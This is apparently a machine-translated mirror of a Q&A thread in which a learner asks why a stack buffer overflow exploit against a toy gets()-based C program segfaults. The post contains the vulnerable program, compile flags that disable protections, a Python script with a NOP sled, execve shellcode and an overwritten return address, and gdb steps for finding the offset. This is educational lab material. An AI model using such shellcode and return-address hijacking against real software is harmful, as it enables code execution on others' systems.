无法运行堆栈缓冲区溢出漏洞利用
[英]Unable to run stack buffer overflow exploit
问题描述
I have to inject a code in the following buffer overflow program. 
我必须在以下缓冲区溢出程序中注入代码。 The code should print the hostname. 该代码应显示主机名。 I have an opcode ( \\x31\\xc0\\x50\\x68\\x6e\\x61\\x6d\\x65\\x68\\x68\\x6f\\x73\\x74\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x54\\x53\\xb0\\x0b\\x50\\xcd\\x80 ) which works. 我有一个操作码( \\x31\\xc0\\x50\\x68\\x6e\\x61\\x6d\\x65\\x68\\x68\\x6f\\x73\\x74\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x54\\x53\\xb0\\x0b\\x50\\xcd\\x80 )起作用。 I have used NOPs and repeated return address. 我已经使用过NOP和重复的返回地址。 But I'm not able to run the code with it and I always end up with a segmentation fault. 但是我无法使用它来运行代码,并且总是会遇到分段错误。 Can anyone help me on this? 谁可以帮我这个事?
Vulnerable.c 脆弱的
#include <stdio.h>
#include <stdlib.h>
int
main(int argc, char * * argv)
{
char * stuff = 0;
int len = 0;
vulnerable();
return 0;
}
int
vulnerable(void)
{
char buf[100];
printf("enter your name: ");
fflush(stdout);
gets(buf);
printf("\"%s\"\n Welcome", buf );
}
I compiled the above program with 我用上面的程序编译了
gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c
Shellcode.py Shellcode.py
print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6
I have called this python program in command line by 我已经在命令行中通过以下方式调用了该python程序
python shellcode.py | ./vulnerable
2 个解决方案
解决方案1
0 2014-12-20 17:46:56
I suggest you to turn on core dump: 我建议您打开核心转储:
ulimit -c unlimited
then do a simple buffer overflow like perl -e 'print "A"x130' and system will generate the dump: open it with gdb -c core and you will see %eip=0x41414141 然后做一个简单的缓冲区溢出,如perl -e 'print "A"x130' ,系统将生成转储:使用gdb -c core打开它,您将看到%eip = 0x41414141
Then you can reduce the buffer injected like perl -e 'print "A"x120' until you get exactly the size of buffer in order to overwrite RET. 然后,您可以减少注入的缓冲区,就像perl -e 'print "A"x120'直到获得确切的缓冲区大小以覆盖RET。
解决方案2
0 2017-02-13 09:32:06
Can you describe the steps to find out the return address?
c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode
Breakpoint 1, vulnerable () at vulnerable.c:17
17 printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
called by frame at 0xbffff7cc
source language c.
Arglist at 0xbffff7bc, args:
Locals at 0xbffff7bc, Previous frame's sp is 0x0
Saved registers:
ebp at 0xbffff7bc, eip at 0xbffff7c0
The example shows that the return address eip 0x80484c9 is saved at 0xbffff7c0 . 该示例显示返回地址eip 0x80484c9保存at 0xbffff7c0 。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.